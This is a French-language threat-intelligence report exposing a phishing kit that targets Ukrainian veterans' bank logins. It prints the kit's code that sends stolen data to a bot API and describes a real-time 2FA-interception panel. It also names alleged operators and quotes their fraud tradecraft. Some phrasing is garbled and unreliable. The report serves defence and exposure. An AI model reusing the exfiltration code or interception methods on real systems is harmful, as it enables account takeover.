5
Les banques dans le collimateur
6
Appels API pour « Unmask »
2
Projets parallèles de hameçonnage
<30
Quelques minutes suffisent pour obtenir une analyse complète
Déclaration relative aux sponsors(cliquez pour agrandir)
Voici le sponsor officiel de cette enquête
🏆 [REDACTED] 🏆
Le plus
faisant autorité registraire qui
collabore avec Netcraft (en trompant leur système) · Fournisseur officiel de domaines pour le
Marché de la drogue FinCEN MSB #31000023456789 · Fournisseur proposant des remises sur les achats en gros · Fidèle adepte du
« L'escroc typique » La communauté VK — mais n'a toujours pas suivi de formation sur l'anonymat
0
Signalements d'abus
mis en œuvre
- Bien qu'il se présente comme « chinois » (de Hong Kong), le créateur est originaire de Gorlovka, République populaire de Donetsk. Le logo chinois est purement décoratif — tout comme leurs conditions générales d'utilisation
- Assure Prise en charge de la langue russe via VKontakte et [REDACTED], vend
.ru pour 200 $, alors que IANA #1606 facture 120₽ (~$1.30) - Avis négatifs sur Trustpilot mentionnant domaines liés au marché des stupéfiants disparaître mystérieusement. Une coïncidence ? Certainement pas.
- Un abonné actif de « L'escroc typique » (Fraudeur type) Communauté VK — quand votre registraire suit des groupes spécialisés dans l'escroquerie, on sait quel est leur public cible
- Collabore avec Netcraft juste ce qu'il faut pour éviter la radiation, tout en conservant l'infrastructure nécessaire aux domaines liés au hameçonnage, aux jeux d'argent et aux stupéfiants
Pendant ce temps, dans « Типичный Мошенник » :
Une promesse faite à notre sponsor : Lorsque ce message publié par « Типичный Мошенник » deviendra réalité — et d'après ce que nous savons, ce n'est qu'une question de quand, et non si — Toute notre équipe va s'inscrire sur VKontakte et rejoindre la communauté. Considérez cela comme notre ovation debout. 👏
* Il s'agit d'une satire. IANA #3765 n'a pas financé cette enquête. L'entreprise l'a toutefois rendue nécessaire en refusant de donner suite à nos signalements d'abus pendant plus de cinq jours. Tout ce qui est indiqué ci-dessus repose sur des informations accessibles au public et sur notre expérience opérationnelle. Lisez notre dossier complet sur IANA #3765 →
Le 20 mars 2026, le pipeline automatisé de détection des menaces de THE ENABLERS REGISTRY a signalé [REDACTED][.]sbs — un domaine récemment enregistré hébergeant un site de hameçonnage se faisant passer pour « Le bouclier du défenseur » (« Shield of the Defender »), une fausse fondation d'aide militaire ukrainienne. Le site cible les anciens combattants ukrainiens, les blessés de guerre et les familles des soldats tombés au combat, en leur promettant une aide financière de l'État tout en dérobant les identifiants bancaires de cinq des plus grandes banques ukrainiennes.
Vous trouverez ci-dessous une analyse détaillée de tous les éléments mis au jour par notre analyse automatisée : les techniques d'ingénierie sociale, l'infrastructure technique, le système de contrôle en temps réel des opérateurs, ainsi que l'identité des personnes qui gèrent ce réseau.
Analyse d'impact
Ce site s'adresse tout particulièrement aux personnes les plus vulnérables : les anciens combattants souffrant de syndrome de stress post-traumatique (SSPT), les familles de soldats tombés au combat qui sollicitent une aide de l'État, ainsi que les militaires blessés confrontés à des démarches administratives complexes. Le vol de chaque identifiant peut entraîner la prise de contrôle totale d'un compte en quelques minutes.
Section 1 : L'appât — La fausse fondation d'aide militaire
Le domaine [REDACTED][.]sbs a été enregistrée le 20 mars 2026 par l'intermédiaire de [REDACTED], un registraire connu pour sa lenteur, voire son absence totale, de réaction face aux signalements d'abus. Le .sbs Le TLD (Side-By-Side) est un gTLD peu coûteux souvent utilisé pour mettre en place des infrastructures de possibly phishing jetables.
Le site se présente comme un portail d'aide professionnel lié aux pouvoirs publics. Un drapeau ukrainien occupe toute la largeur de l'en-tête, des images militaires lui confèrent une apparence d'authenticité, et le contenu est soigneusement rédigé en ukrainien dans un style bureaucratique qui rappelle celui des programmes gouvernementaux officiels.
![Page d'accueil du site de hameçonnage « [REDACTED] » présentant une fausse fondation d'aide militaire](/_mirror/redacted-logo.svg)
Capture d'écran n° 5 — Page d'accueil du site de hameçonnage se faisant passer pour « Щит Захисника » (Bouclier du Défenseur).
Pour se donner une apparence de crédibilité, les exploitants ont créé un compteur de statistiques bien visible sur la page d'accueil :
- 2 847 candidatures — ce qui laisse entendre que des milliers de personnes ont déjà reçu de l'aide
- 47,2 millions de ₴ distribués — un chiffre élevé mais plausible à l'UAH
- 19 programmes — ce qui laisse entrevoir une opération de grande envergure, impliquant plusieurs programmes
Ces chiffres sont entièrement inventés ; ils sont intégrés de manière fixe dans le code source de la page, sans aucun lien avec le serveur. Ils n'ont qu'un seul but : servir de preuve sociale pour surmonter les hésitations de la victime.
Section 2 : Le piège — 5 banques, un seul objectif
Après avoir cliqué sur « Подати заявку » (Soumettre la demande), la victime accède à un écran lui permettant de choisir une banque. Cinq des plus grandes banques de détail ukrainiennes s'affichent parmi les options, chacune avec son identité visuelle et son logo officiels. C'est à ce stade que l'ingénierie sociale passe de la manipulation émotionnelle au vol technique.

Capture d'écran n° 6 — Écran de sélection de la banque. Chaque option déclenche une séquence personnalisée de vol d'identifiants.
L'analyse du bundle JavaScript du site a révélé que chaque banque dispose d'un séquence unique de collecte d'identifiants en plusieurs étapes, adapté au processus d'authentification réel de cette banque :
PrivatBank
ConnexionMot de passeCode PINSMS
monobank
ConnexionCode PINSMSE-mail
Oschadbank
ConnexionVérifierSMS
Ukrsibbank
ConnexionCode PINSMS
Le déroulement de l'attaque est toujours le même, quelle que soit la banque :
Page d'aide factice
Choix de la banque
Cloner la connexion
Interception de l'authentification à deux facteurs (2FA)
Prise de contrôle d'un compte

Capture d'écran n° 7 — Page de connexion clonée de PrivatBank.

Capture d'écran n° 9 — Page de connexion PUMB clonée.

Capture d'écran n° 10 — Déroulement complet de l'attaque : de la fausse page d'aide militaire au vol d'identifiants et à la prise de contrôle du compte, en passant par la sélection de la banque.
La pile technologique : SPA React interface utilisateur fournie via CDN IANA #1910, avec un Express.js back-end chargé de l'exfiltration des identifiants. L'architecture React permet de créer des formulaires en plusieurs étapes qui s'intègrent parfaitement et sont pratiquement impossibles à distinguer des interfaces bancaires légitimes.
Section 3 : Commande en temps réel par l'opérateur
Il ne s'agit pas d'un simple outil de collecte d'identifiants doté d'une base de données statique. Le kit de possibly phishing comprend un Panneau de contrôle WebSocket en temps réel qui permet à un opérateur humain de manipuler chaque session de victime en temps réel.
Le point de terminaison WebSocket à l'adresse wss://[REDACTED][.]sbs/ws prend en charge les types de messages suivants :
register — New victim session created
update_user_data — Stolen credentials transmitted to operator
next_step — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question — Operator sends custom prompt to victim
Grâce à ce contrôle en temps réel, l'opérateur peut :
- Forcer un état d'attente — afficher le message « Traitement de votre demande en cours… » pendant qu’ils se connectent au véritable compte bancaire de la victime
- Rediriger vers une étape spécifique — demander à nouveau un code par SMS si le premier a expiré
- Afficher de faux messages d'erreur — « Code invalide, veuillez le saisir à nouveau » pour récupérer plusieurs jetons d'authentification à deux facteurs
- Poser des questions personnalisées — demander la date de naissance, le numéro de carte ou toute autre information au cours de la session
En quoi cela est-il dangereux ?
Le contrôle en temps réel exercé par l'opérateur permet de contourner les protections par authentification à deux facteurs (2FA) basées sur le temps. L'opérateur intercepte le code SMS et l'utilise pendant sa période de validité — généralement comprise entre 30 et 120 secondes — tandis que la victime reste les yeux rivés sur une fausse animation indiquant que l'opération est en cours.

Capture d'écran n° 8 — Formulaire de saisie du numéro de téléphone utilisé pour lancer le vol d'identifiants.

Capture d'écran n° 11 — Panneau de contrôle en temps réel de l'opérateur permettant de gérer les sessions des victimes.
L'ensemble des données volées par session : phone, password, PIN, SMS code, card number, date of birth, et email.
Section 4 : Dans les coulisses de IANA #1910 — Deux projets, un seul serveur
Le proxy IANA #1910 masque le serveur d'origine, mais le pipeline d'analyse de l'infrastructure de THE ENABLERS REGISTRY a permis d'identifier la véritable adresse IP d'origine : 45.131.214[.]148, hébergé sur RapidSeedbox / LeaseWeb aux Pays-Bas.
Un détail essentiel : [REDACTED][.]sbs est acheminé via IANA #1910, en masquant son adresse IP d'origine. Mais notre système suit également hlpforvpeople[.]sbs — un nom de domaine associé, enregistré auprès du même bureau d'enregistrement IANA #3765 et présentant des similitudes. Ce nom de domaine est PAS derrière IANA #1910, en exposant directement son adresse IP d'origine : 45.131.214[.]148.
Se connecter directement à cette adresse IP — sans Host en-tête — a révélé quelque chose d’inattendu : un un site de hameçonnage totalement différent. Au lieu de l'aide militaire ukrainienne, le serveur virtuel par défaut a fourni « Carte d'assurance maladie », une opération de hameçonnage liée à l'assurance maladie en Indonésie. Même serveur, des victimes complètement différentes, un pays complètement différent.
Même serveur, mêmes opérateurs, victimes différentes
- Projet n° 1 : Aide militaire ukrainienne → vol d'identifiants bancaires d'anciens combattants
- Projet n° 2 : L'assurance maladie indonésienne → vole les identifiants de santé des citoyens
- Même pile Express.js, même panneau de contrôle en temps réel via WebSocket
- Même interface de gestion de serveur BT-Panel (宝塔)
- Domaine C2 du deuxième projet :
[REDACTED] — un panneau de possibly phishing connu, répertorié dans la base de données des menaces de THE ENABLERS REGISTRY - Commentaires en russe dans le code source du projet indonésien, ce que confirment les développeurs de CIS eux-mêmes

Capture d'écran n° 12 — Deux opérations de hameçonnage parallèles partageant le même serveur d'origine : aide militaire ukrainienne (
[REDACTED]) et assurance maladie indonésienne (HealthCare ID).
Le modèle de hameçonnage indonésien est un kit connu répertorié dans la base de données de renseignements sur les menaces de THE ENABLERS REGISTRY. Nous avons constaté que des variantes de ce modèle précis avaient été déployées dans toute l'Asie du Sud-Est, ciblant des institutions financières indonésiennes, thaïlandaises et vietnamiennes. Les opérateurs se contentent de remplacer les modèles spécifiques à chaque pays tout en réutilisant la même infrastructure en arrière-plan.
Des criminels sans scrupules
Voici la réalité des opérations de hameçonnage modernes :
les opérateurs se moquent bien de savoir à qui ils volent. Des vétérans ukrainiens à la recherche d’une aide militaire, des travailleurs indonésiens souscrivant une assurance maladie… La cible change en fonction du modèle qui génère le plus de revenus. Les mêmes opérateurs russophones mènent ces deux campagnes simultanément à partir du même serveur, passant d’une victime à l’autre dans différents pays comme on change de chaîne de télévision. Aujourd’hui, ce sont les banques ukrainiennes. Demain, ce pourrait être les banques israéliennes — comme Bonya s’en est déjà enquis en mars 2026.
Section 5 : Le fichier config.json qui a tout révélé
Voici comment un seul fichier mal configuré a fait capoter toute l'opération — étape par étape.
Après avoir identifié le deuxième projet du serveur d'origine, celui de THE ENABLERS REGISTRY, Analyseur JS — notre outil automatisé d'analyse JavaScript — a été orienté vers l'ensemble de fichiers du site de hameçonnage indonésien à l'adresse https://45.131.214[.]148/assets/index-ZMQxHb_h.js. L'analyseur a extrait tous les points de terminaison API, les URL externes et les chemins de configuration du fichier JavaScript de 335 Ko. Parmi les résultats :
- Cinq points de terminaison API à l'adresse
[REDACTED] — le panneau C2 pour la vérification des identifiants - Une connexion WebSocket vers
wss://rezervtemka[.]cc - Intégration du pixel Facebook pour le suivi des victimes
- Une référence à
/config.json — chargé à l'exécution pour la configuration du bot [REDACTED]
En suivant cette piste, nous avons récupéré /config.json à partir de l'adresse IP d'origine. Le fichier était accessible sans aucune authentification — il se trouvait dans le répertoire racine du site web, accessible à tous :
async function loadConfig() {
const response = await fetch('/config.json');
// ...
}
async function sendNotification() {
const cfg = await loadConfig();
await fetch(`https://api.[REDACTED].org/bot${cfg.bot_token}/sendMessage`, {
method: 'POST',
body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
});
}
Le /config.json le fichier était accessible directement depuis l'adresse IP d'origine — pas d'authentification, pas de contrôle d'accès, juste un simple fichier JSON situé dans le répertoire racine du site web:
{
"bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
"chat_id": "-100XXXXXXXXXX"
}
Un jeton de bot [REDACTED] fait office à la fois de nom d'utilisateur et de mot de passe. Toute personne en possession de ce jeton peut effectuer des appels API au nom de ce bot. Les opérateurs ont laissé le leur dans un fichier accessible au public. Six appels API plus tard, nous avions tout ce qu'il fallait :
getMe — Identifiant du bot : « MonettiCRM » (@MonettiCRM_bot)
getChat(chat_id) — Nom du groupe : « Idr card » avec un lien d'invitation actif
getChatAdministrators — 3 administrateurs, dont le créateur du groupe
getChat(creator_id) — Auteur :
@monettiescobar,
[REDACTED] Premium, profil professionnel, fuseau horaire UTC+3
getChat(admin2_id) — Deuxième administrateur : profil vide, compte secondaire présumé
getChatMemberCount — 5 membres au total dans le groupe des opérateurs
![Chaîne OSINT montrant 6 appels à l'API [REDACTED] depuis le fichier config.json jusqu'à l'identification complète de l'opérateur](/_mirror/redacted-logo.svg)
Capture d'écran n° 13 — La chaîne OSINT complète : du fichier config.json exposé à l'identification complète de l'opérateur en 6 appels API.
D’un simple fichier mal configuré à l’identification complète des opérateurs en six requêtes HTTP. Pas d’exploits, pas d’accès non autorisé — juste des appels standard à l’API du bot [REDACTED] utilisant un jeton que les opérateurs eux-mêmes avaient laissé exposé.
Section 6 : Les opérateurs
Remarque sur la créativité criminelle
Ce qui suit est un véritable cours magistral sur les pires choix d'alias possibles. Nous avons MONETTI ESCOBAR — parce que rien ne vaut mieux pour passer inaperçu que de s’appeler comme le baron de la drogue le plus célèbre de l’histoire. Et puis il y a Bonya, également connu sous le nom de PapaZakonVor (littéralement « Papa-Voleur-de-droit » — une référence maladroite à la hiérarchie criminelle russe), Boa, et bubullikk. Et enfin Devoys, dont le pseudonyme est @devosus On dirait étrangement « dev ops us » — un développeur qui a intégré son intitulé de poste dans son nom d'utilisateur. Ce sont ces personnes-là qui pensaient pouvoir déjouer les systèmes automatisés de veille sur les menaces. Spoiler : elles n'y sont pas parvenues.
![Le groupe d'opérateurs [REDACTED] « Idr card » a été compromis via un jeton de bot](/_mirror/redacted-logo.svg)
Capture d'écran n° 14 — Le groupe d'opérateurs
[REDACTED] « Idr card », révélé à la suite de la fuite du jeton du bot.
![Avatar [REDACTED] de MONETTI ESCOBAR](/_mirror/redacted-logo.svg)
Propriétaire / Créateur
MONETTI ESCOBAR
@monettiescobar
Fuseau horaire : UTC+3 (région de la CEI)
10 messages publics — OPSEC stricte
Chat TraFFeeQMedusa Google AdsChaîne « Deepfakes »
![Avatar de Bonya sur [REDACTED]](/_mirror/redacted-logo.svg)
Opérateur / Circulation
Bonya
@BoaCC159
Alias : PapaZakonVor, Boa, bubullikk
261 messages répartis dans 12 groupes
DC2 — Amsterdam, Pays-Bas
CryptoGrabMarché STYXRaven CCEMPIRE CHATPhoenix Solution
Développeur / Programmeur
Devoys
@devosus
Développeur de kits de possibly phishing — les opérateurs l'appellent « codeur »
On leur a demandé de « réfléchir à la défense » lorsque la faille a été découverte
Conçu pour un impact minimal sur l'environnement
Poignée @devosus ≈ « dev ops us » — intitulé du poste utilisé comme nom d'utilisateur
Développeur de kitsInfrastructuresSécurité
MONETTI ESCOBAR — Le Patron
MONETTI applique des mesures de sécurité opérationnelle très strictes — uniquement 10 messages publics répartis en deux groupes. Mais ce sont ces groupes qui en disent long : Chat TraFFeeQ (arbitrage de trafic à des fins frauduleuses), Medusa Google Ads (pratiques de « black hat » sur Google Ads), et un Chaîne « Deepfakes ». Son profil professionnel sur [REDACTED] indique « Есть предложение » (« J'ai une proposition à te faire ») — qui font ouvertement la promotion de leurs services. Le fuseau horaire UTC+3 (correspondant à celui de Moscou, Minsk et Kiev) et les horaires d’ouverture 24 h/24, 7 j/7 confirment qu’il s’agit d’une entreprise basée dans la CEI et fonctionnant sans interruption.
Bonya — Le négligent
Contrairement à la politique de sécurité opérationnelle (OPSEC) rigoureuse de MONETTI, Bonya (ancien pseudonyme : PapaZakonVor — ce qui signifie en gros « DaddyThiefByLaw ») a laissé derrière lui une trace numérique considérable — 261 messages répartis entre 12 groupes clandestins. L'historique de ses conversations ressemble à un CV de criminel :
Les propres mots de Bonya (traduit du russe)
- « fusibles pour un courant de 2,0 » → « Rien d'autre que du hameçonnage [sécurité bancaire] 2.0 » — discussion sur la compatibilité des kits de hameçonnage avec les nouveaux systèmes de sécurité bancaires
- « C'est difficile de trouver de bons drops » → « Les bons passeurs d'argent sont difficiles à trouver » — recherche de complices pour un blanchiment d'argent
- « Viens travailler chez moi au centre culturel » → « Viens travailler dans mon centre d'appels » — recrutement d'opérateurs
- « Y a-t-il ici des gens qui ont déjà travaillé avec des banques israéliennes ? » → « Y a-t-il ici quelqu'un qui ait déjà travaillé avec des banques israéliennes ? » — extension à de nouvelles cibles (mars 2026)
- « Je ne vois pas vraiment de logos sur la Finke » → « On ne voit pas beaucoup de registres financiers » — discussion sur la qualité des identifiants volés
- « Si 1 proxy correspond à 1 ou 2 banques de courant » → « Un mandataire pour seulement 1 à 2 banques » — discussion sur la sécurité opérationnelle en matière de fraude bancaire
- « Le distributeur lui a gardé sa carte » → « Sa carte a été avalée par le distributeur. » — un « passeur d'argent » leur a volé ₴60 000, prétextant que le distributeur avait avalé la carte. Même les criminels se font escroquer par leurs propres complices.
Les associations auxquelles il appartient permettent de brosser un tableau complet : CryptoGrab (pirates de portefeuilles cryptos), Marché STYX (marché noir de données volées), Vérificateur CC Raven (outils de validation des cartes bancaires), EMPIRE CHAT et Phoenix Solution (coordination des fraudes). Il ne s'agit pas d'un délinquant occasionnel, mais d'une personne profondément impliquée dans l'écosystème de la cybercriminalité.
Devoys — Le développeur
Le pilier technique de l'opération. Conçu pour laisser une empreinte publique minimale — lorsque le groupe a été piraté, Bonya a explicitement fait appel à lui : « @devosus, pense à la défense avant qu’on nous défonce le cul » — « @devosus, pensons à la défense avant de nous faire botter les fesses. » Sa réaction sarcastique face à cette violation — « quand à Interpol » (« Quand faut-il interpoler ? ») — ce qui laisse penser que ce n'est pas la première fois qu'ils échappent de justesse à un accident.
Analyse comportementale : 261 messages décryptés
Le pipeline OSINT de THE ENABLERS REGISTRY a collecté et traduit les 261 messages publics provenant de Bonya et provenant de 12 groupes [REDACTED] clandestins (juin 2024 — mars 2026). Traduction automatique via l'API DeepL, avec correction manuelle du contexte. Ces messages révèlent un profil opérationnel complet — classé ci-dessous par type d'activité criminelle.
Diffusion des messages : 261 messages répartis dans 12 groupes
- 💬ONE|Chat — 91 messages (coordination de la lutte contre la fraude)
- Actualités/Vérifications — 37 messages (arnaques à la vérification)
- Rolex | discussion générale — 28 messages (carding)
- EMPIRE CHAT — 24 messages (marché noir)
- Fbstor — 23 messages (arbitrage de trafic)
- FB-DOC — 22 messages (fraude publicitaire)
- Phoenix Solution — 17 messages (fraude bancaire)
- CryptoGrab — 11 messages (consommation de cryptomonnaie)
- Marché STYX — 2 messages (marché noir)
- Vérificateur CC Raven — 2 messages (vérification des cartes)
Fraude bancaire et hameçonnage
💬ONE|Chatmars 2025
« Il n'y a que 2,0 phish ici »
Et là, des fiches pour un courant de 2,0
Examen de la compatibilité des kits de possibly phishing avec les nouveaux protocoles de sécurité bancaires
💬ONE|Chatmars 2025
« Mec, ici, on ne vend rien sur Phish, c'est Phish pour le paiement. »
Mec, ici on ne vend rien avec des jetons, il faut payer en jetons.
Distinguer le « possibly phishing à des fins de vente » du « possibly phishing à des fins de vol direct »
Phoenix Solutionmars 2026
« Y a-t-il ici des personnes qui ont déjà travaillé avec des banques en Israël ? »
Y a-t-il ici des gens qui ont déjà travaillé avec des banques israéliennes ?
Extension des activités au secteur bancaire israélien — 5 jours avant notre enquête
Rolex | discussion généraleseptembre 2024
« Si un seul mandataire, seulement une ou deux banques »
Si 1 proxy correspond à 1 ou 2 banques de courant
Sécurité opérationnelle face à la fraude impliquant plusieurs banques : un proxy pour 1 à 2 banques afin d'éviter la détection
Rolex | discussion généraleseptembre 2024
« Je ne vois pas grand-chose en matière de registres financiers »
Je ne vois pas vraiment de logos sur la Finke
Critiques concernant la qualité des identifiants bancaires volés sur les marchés clandestins
Les « mules financières » et le « cash-out »
💬ONE|Chatmars 2025
« Les bonnes trouvailles sont rares »
C'est difficile de tomber sur de bons drops
« Drops » = des « mules » qui encaissent des fonds volés. Ils se plaignent de la difficulté à recruter.
💬ONE|Chatmars 2025
« Viens travailler dans mon centre d'appels »
Venez travailler au centre culturel avec moi
Recrutement actif de personnes pour travailler dans un centre d'appels spécialisé dans la fraude
Actualitésjuin 2024
« On nous a volé 60 000 »
On nous a volé 60k
Un « passeur d'argent » a volé ₴60 000 aux escrocs eux-mêmes. Une justice ironique.
Actualitésjuin 2024
« Mais comment, bordel, un distributeur a-t-il pu avaler la carte ? »
Mais putain, comment un distributeur a-t-il pu avaler ma carte ?
Le passeur a prétendu que le distributeur avait « avalé » la carte pour s'approprier l'argent volé. Des escrocs qui arnaquent d'autres escrocs.
Actualitésjuin 2024
« Elle nous l'a transféré, mais ensuite, nous n'avions plus le compte principal pour transférer l'argent. »
Elle nous l'a refilé, mais on n'avait pas le moyen de transfert principal pour envoyer l'argent
Description de la chaîne de retrait d'argent : victime → compte intermédiaire → « mule » principale
Fraude au trafic et abus publicitaires
EMPIRE CHATmars 2026
« Je n'utilise pas Google, seulement Facebook »
Bon, je n'utilise pas Google, seulement Facebook.
Spécialisé dans la fraude publicitaire sur Facebook — générant du trafic vers des pages de hameçonnage
FB-DOCfévrier 2026
« Moi non plus, je n'investirais pas % du budget publicitaire sans garant. »
Moi non plus, je n'investirais pas en fonction d'un pourcentage des dépenses sans garantie.
Négociation des conditions de paiement pour la diffusion de campagnes publicitaires frauduleuses sur Facebook
CryptoGrabjanvier 2025
« J'ai essayé l'AML sur Facebook pour cibler le marché américain, mais je n'ai trouvé aucune configuration valable en ligne. »
J'ai essayé de trouver des informations sur l'AML sur Facebook, mais je n'ai pas trouvé non plus de liens pertinents, même anciens, sur Internet.
Tentative d'utilisation des publicités Facebook pour mettre en place des escroqueries liées à la lutte contre le blanchiment d'argent ciblant des victimes américaines
Profil psychologique : Bonya
Le corpus de 261 messages révèle une cybercriminel de niveau intermédiaire dont les activités sont variées : hameçonnage bancaire, réseaux de « mules financières », fraude publicitaire sur Facebook, détournement de cryptomonnaies et vérification de cartes de crédit. Caractéristiques principales :
- Négligence opérationnelle — 261 messages publiés dans des groupes publics à partir d'un seul compte. L'utilisation de plusieurs pseudonymes (PapaZakonVor → Boa → Bonya) suggère une prise de conscience des règles de sécurité opérationnelle (OPSEC), mais un manquement à leur application.
- État d'esprit en matière de recrutement — invite activement les gens à « venir travailler dans mon centre d'appels » et vend son savoir-faire opérationnel contre de l'argent
- Indifférence envers les victimes — aborde les cibles ukrainiennes, européennes, israéliennes et américaines avec le même détachement. La géographie n'est qu'une variable dans l'équation de la fraude
- Problèmes de confiance — a été trahi par son propre passeur d'argent pour 60 000 ₴. Cela reflète, ironiquement, la méfiance qu'il suscite chez ses victimes
- Axé sur l'expansion — pas plus tard qu’en mars 2026, en recherchant activement de nouveaux marchés bancaires (Israël), ce qui laisse penser que l’opération de hameçonnage ukrainienne n’est qu’une des nombreuses opérations menées de front
Bonya : historique complet des messages (253 messages répartis dans 12 groupes)
-- Phoenix Solution (16 messages) --
B
Bonya2026-03-17 14:22
Y a-t-il ici des personnes qui ont déjà travaillé avec des banques en Israël ?Y a-t-il ici des gens qui ont déjà travaillé avec des banques israéliennes ?
B
Bonya2026-03-17 14:22
et qui travaillent en silence, eux aussi.nous travaillons discrètement nous aussi
B
Bonya2026-03-17 14:17
Comment ça va ?Comment ça va ?
B
Bonya2026-03-17 14:17
Bonjour à tousSalut à tous !
B
Bonya2026-03-15 19:02
Bon, c'est pratiquement tout réparé maintenant.Bon, dans l'ensemble, tout est déjà réglé
B
Bonya2026-03-15 19:02
Bon, c'est un peu galèreBon, on a quand même causé un peu de galère
B
Bonya2026-03-15 19:01
Ouais, moi aussi j'ai pas mal bossé en coulisses, c'est la galère.Ouais, moi aussi, j'en ai vraiment marre de ce boulot tranquille
B
Bonya2026-03-15 19:00
Comment s'est passé ton jour de congé ?Comment s'est passé le week-end ?
B
Bonya2026-03-15 19:00
Vous tous.À tous, en commun
B
Bonya2026-03-14 14:29
Il n'est plus vraiment anonyme maintenant que tout le monde sait que c'est Marik.Il n'est plus vraiment anonyme, puisque tout le monde sait qui est Marik.
B
Bonya2026-03-14 14:24
RenaissanceIl s'est réincarné
B
Bonya2026-03-14 14:24
Ahahahahahahahahahahahahahahahahahahahahahahahahah.Ahahahahahahahah
B
Bonya2026-03-14 14:23
J'étais déçu de voir que le salon de discussion avait disparu.J'étais vraiment déçu quand j'ai vu que le chat avait disparu
B
Bonya2026-03-14 14:22
Je croyais que je ne te retrouverais jamais.Je croyais déjà que je ne vous retrouverais plus
B
Bonya2026-03-14 14:22
KooКу
B
Bonya2026-03-14 14:22
PutainЕба
-- 👨⚕️ FB-DOC — Discussion sur l'arbitrage de trafic (21 messages) --
B
Bonya2026-03-15 07:23
@fbdoc21@fbdoc21
B
Bonya2026-03-15 07:20
Donne-toi un coup sur le front avec ta bite.Je me frappe le front avec ma bite
B
Bonya2026-03-06 15:18
Ça fait genre cinq sur l'écran de 2,5😂.C'est comme un 5 sur la capture d'écran 2,5 😂
B
Bonya2026-02-19 17:05
à vous tous.à vous tous
B
Bonya2026-02-19 17:04
Si tu conclus une affaire, je vais rire.Si tu ouvres une position, je vais me moquer de toi
B
Bonya2026-02-19 17:04
continental ?« continental » ?
B
Bonya2026-02-19 17:04
La voilà donc.Eh bien, voilà, elle est d'accord
B
Bonya2026-02-19 17:01
Veillez donc toujours à vérifier les antécédents lorsque vous demandez un garant.Alors, vérifiez toujours cela lorsque vous posez des questions sur la garantie.
B
Bonya2026-02-19 17:00
Il a posé des questions sur un garant, puis il a disparu aussitôt.Il a posé une question sur le garant et a disparu aussitôt
B
Bonya2026-02-19 17:00
ay carinaSalut Karina
B
Bonya2026-02-19 16:59
Alors, tu veux trouver un garant ?Alors, tu comptes sur la garantie ?
B
Bonya2026-02-19 16:57
Moi non plus, je n'accorderais pas de crédit sur la base d'un pourcentage des dépenses sans garant.Moi non plus, je n'investirais pas en fonction d'un pourcentage des dépenses sans garantie.
B
Bonya2026-02-19 16:57
я ?я ?
B
Bonya2026-02-19 16:57
Bon, elle a posté des captures d'écran et toi, tu ne m'as rien donné.Bon, elle a posté des captures d'écran, mais toi, tu n'as rien mis.
B
Bonya2026-02-19 16:56
regarde les captures d'écran qu'elle a postéesRegarde les captures d'écran qu'elle a postées
B
Bonya2026-02-19 16:55
Il n'a pas parlé d'un garant ?Il n'a pas parlé du garant ?
B
Bonya2026-02-19 16:54
T'es un dingue 😂T'es un taré, là 😂
B
Bonya2026-02-19 16:53
Vous avez demandé un garant.Tu as demandé au garant
B
Bonya2026-02-19 16:52
oùà quel endroit
B
Bonya2026-02-17 14:37
Qui va fournir à un magasin de belles voitures ?Qui va ouvrir une boutique avec de belles voitures ?
B
Bonya2026-02-17 12:10
Où tu veux, ils s'en chargeront pour toi 😂N'importe où, s'ils en ont envie, ils te le feront 😂
-- EMPIRE CHAT (24 messages) --
B
Bonya2026-03-14 13:17
J'ai déjà trouvé comment faire, mais je suis trop paresseux pour l'expliquer.J'ai déjà compris comment ça marche, mais j'ai pas envie de l'expliquer
B
Bonya2026-03-14 13:17
Il va te mettre une raclée, quoi qu'il arrive.Dans tous les cas, il va te rouler.
B
Bonya2026-03-12 17:16
De différentes manières.De différentes manières
B
Bonya2026-03-12 17:08
+ En plus, il y a beaucoup d'orages en ce moment.+ Il y a de violents orages en ce moment
B
Bonya2026-03-12 17:07
Si c'est noir, je parie que…Si c'était noir, j'aurais parié
B
Bonya2026-03-12 17:07
Ça dépend du type d'offre ; si c'est une offre « blanche », oui.Ça dépend de l'offre : si c'est la blanche, alors oui.
B
Bonya2026-03-12 17:06
Ce sont deux mondes différentsDeux mondes différents, c'est
B
Bonya2026-03-12 17:06
Il n'y en a pas d'autreIl n'y en a pas d'autre
B
Bonya2026-03-12 17:06
Vous pouvez configurer le système de manière à ce que seuls les PCOn peut y configurer le système pour que seuls les PC soient pris en compte.
B
Bonya2026-03-12 17:05
Google n'est pas aussi efficace que je le crois.Google n'est pas aussi efficace qu'à mon avis
B
Bonya2026-03-12 17:05
Eh bien, je ne cherche pas sur Google, je suis juste sur Facebook.Bon, je n'utilise pas Google, seulement Facebook.
B
Bonya2026-03-12 17:05
À condition de devoir trouver une ligature à un moment ou à un autre.À condition qu'il faille encore, pendant la guerre, rassembler tous ces idiots en un seul groupe
B
Bonya2026-03-12 17:04
Les rebuts, les « ackeys » qui s'envolent comme des tempêtes. Etc.Les rejets, les comptes s'envolent comme ça, à cause des tempêtes. Etc.
B
Bonya2026-03-12 17:04
Tout n'est pas rose, mon pote.C'est pas tout, mon pote, c'est pas si simple que ça
B
Bonya2026-03-12 17:03
Toutes les acquisitions régulières d'Air avec une confiance accrueToutes les batteries Air habituelles offrant la meilleure autonomie
B
Bonya2026-03-12 17:03
Il n'y a actuellement aucune agence de qualité sur le marché.Il n'y a pas de bonnes agences sur le marché en ce moment.
B
Bonya2026-03-12 17:02
Plus angoissant qu'effrayantC'est plutôt stressant que flippant
B
Bonya2026-03-12 17:02
Les cryptomonnaies, l'instinct du jeu et la négritude s'expriment tous à plein cœurLes cryptos, les jeux d'argent et le black, ça coule à flots
B
Bonya2026-03-12 17:01
La dernière initiative de la ville a été de se lancer dans le 2D.La dernière chose qui m'a marqué, c'était ce jeu en 2D
B
Bonya2026-03-12 17:01
En ce qui concerne l'escalade, si vous me demandez mon avis, que ce soit de ma part ou du point de vue du budget, pour trouver des voies en 2D, il faut compter entre 1 000 et 2 000 zeles à dépenser en essais, et ça ne durera pas longtemps.Si on cherche à savoir si ça marche, que ce soit avec mes propres moyens ou avec le budget alloué, pour trouver ce qui fonctionne en 2D, il faut dépenser 1 à 2 000 zels en tests, et même là, ça ne tiendra pas longtemps.
B
Bonya2026-03-12 17:00
Je verseJe verse
B
Bonya2026-03-12 16:59
(car il n'existe pas d'exigences de ce type pour les offres « blanches »)Parce qu'il n'y a pas de telles exigences pour les offres « blanches »)
B
Bonya2026-02-14 14:33
